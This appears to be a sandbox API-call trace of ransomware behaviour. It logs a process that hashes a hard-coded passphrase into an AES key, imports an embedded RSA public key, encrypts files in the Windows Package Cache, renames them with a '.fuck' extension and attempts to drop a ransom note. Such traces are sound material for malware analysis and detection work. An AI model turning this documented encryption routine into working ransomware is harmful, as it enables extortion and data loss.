dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.728] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.728] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.729] CryptHashData (hHash=0x28e8638, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.729] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8638, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7238) returned 1 [0240.729] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.729] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.729] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f1750) returned 1 [0240.729] CryptImportPublicKeyInfo (in: hCryptProv=0x28f1750, dwCertEncodingType=0x1, pInfo=0x2905ea8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905ed8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905ee0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e6bb8) returned 1 [0240.729] CryptEncrypt (in: hKey=0x28e6bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.729] CryptEncrypt (in: hKey=0x28e6bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f1200*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f1200*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.730] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f1200, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.730] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.730] CryptEncrypt (in: hKey=0x28e7238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.730] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.730] CloseHandle (hObject=0xffffffff) returned 1 [0240.730] CloseHandle (hObject=0xffffffff) returned 1 [0240.730] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), bFailIfExists=0) returned 0 [0240.730] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", dwFileAttributes=0x0) returned 0 [0240.731] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg")) returned 0 [0240.731] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.fuck" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.fuck")) returned 0 [0240.732] CryptDestroyHash (hHash=0x28e8638) returned 1 [0240.732] CryptDestroyKey (hKey=0x28e7238) returned 1 [0240.732] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.732] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.732] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.732] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.732] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\readme_back_files.htm")) returned 0xffffffff [0240.732] AreFileApisANSI () returned 1 [0240.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2857060, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0240.733] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.733] GetLastError () returned 0x5 [0240.733] GetLastError () returned 0x5 [0240.733] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.733] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.736] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.736] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.736] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.736] GetLastError () returned 0x5 [0240.736] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm")) returned 0x20 [0240.736] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm", dwFileAttributes=0x80) returned 0 [0240.737] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.737] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.737] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg", dwFileAttributes=0x2) returned 0 [0240.738] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.740] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.740] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.740] CryptHashData (hHash=0x28e8578, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.740] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7238) returned 1 [0240.741] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.741] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.741] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f1640) returned 1 [0240.741] CryptImportPublicKeyInfo (in: hCryptProv=0x28f1640, dwCertEncodingType=0x1, pInfo=0x2905008*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905038*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905040*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e78f8) returned 1 [0240.742] CryptEncrypt (in: hKey=0x28e78f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.742] CryptEncrypt (in: hKey=0x28e78f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f0e48*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f0e48*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.742] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f0e48, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.742] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.742] CryptEncrypt (in: hKey=0x28e7238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.742] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.742] CloseHandle (hObject=0xffffffff) returned 1 [0240.742] CloseHandle (hObject=0xffffffff) returned 1 [0240.742] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm"), bFailIfExists=0) returned 0 [0240.743] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm", dwFileAttributes=0x0) returned 0 [0240.743] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg")) returned 0 [0240.743] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.fuck" (normalized: "c:\\users\\all users\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.fuck")) returned 0 [0240.744] CryptDestroyHash (hHash=0x28e8578) returned 1 [0240.744] CryptDestroyKey (hKey=0x28e7238) returned 1 [0240.744] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.744] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.744] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.744] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.744] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\readme_back_files.htm")) returned 0xffffffff [0240.744] AreFileApisANSI () returned 1 [0240.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2856ec0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0240.745] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.745] GetLastError () returned 0x5 [0240.745] GetLastError () returned 0x5 [0240.745] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.745] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.745] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.745] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.745] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.746] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.746] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.746] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8638 [0240.746] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.746] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.746] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.746] GetLastError () returned 0x5 [0240.746] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 0x20 [0240.746] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0240.747] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.747] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.748] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0240.748] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f1398) returned 1 [0240.751] CryptCreateHash (in: hProv=0x28f1398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.751] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.751] CryptHashData (hHash=0x28e7238, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.751] CryptDeriveKey (in: hProv=0x28f1398, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7338) returned 1 [0240.751] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.751] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.751] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f0b18) returned 1 [0240.752] CryptImportPublicKeyInfo (in: hCryptProv=0x28f0b18, dwCertEncodingType=0x1, pInfo=0x2904cc8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2904cf8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2904d00*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e7838) returned 1 [0240.752] CryptEncrypt (in: hKey=0x28e7838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.752] CryptEncrypt (in: hKey=0x28e7838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f0ed0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f0ed0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.752] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f0ed0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.752] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.752] CryptEncrypt (in: hKey=0x28e7338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.752] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.752] CloseHandle (hObject=0xffffffff) returned 1 [0240.752] CloseHandle (hObject=0xffffffff) returned 1 [0240.752] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), bFailIfExists=0) returned 0 [0240.753] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x0) returned 0 [0240.753] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg")) returned 0 [0240.754] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.fuck" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.fuck")) returned 0 [0240.754] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.754] CryptDestroyKey (hKey=0x28e7338) returned 1 [0240.754] CryptReleaseContext (hProv=0x28f1398, dwFlags=0x0) returned 1 [0240.754] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.754] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.754] GetLastError () returned 0x5 [0240.754] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 0x20 [0240.755] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package 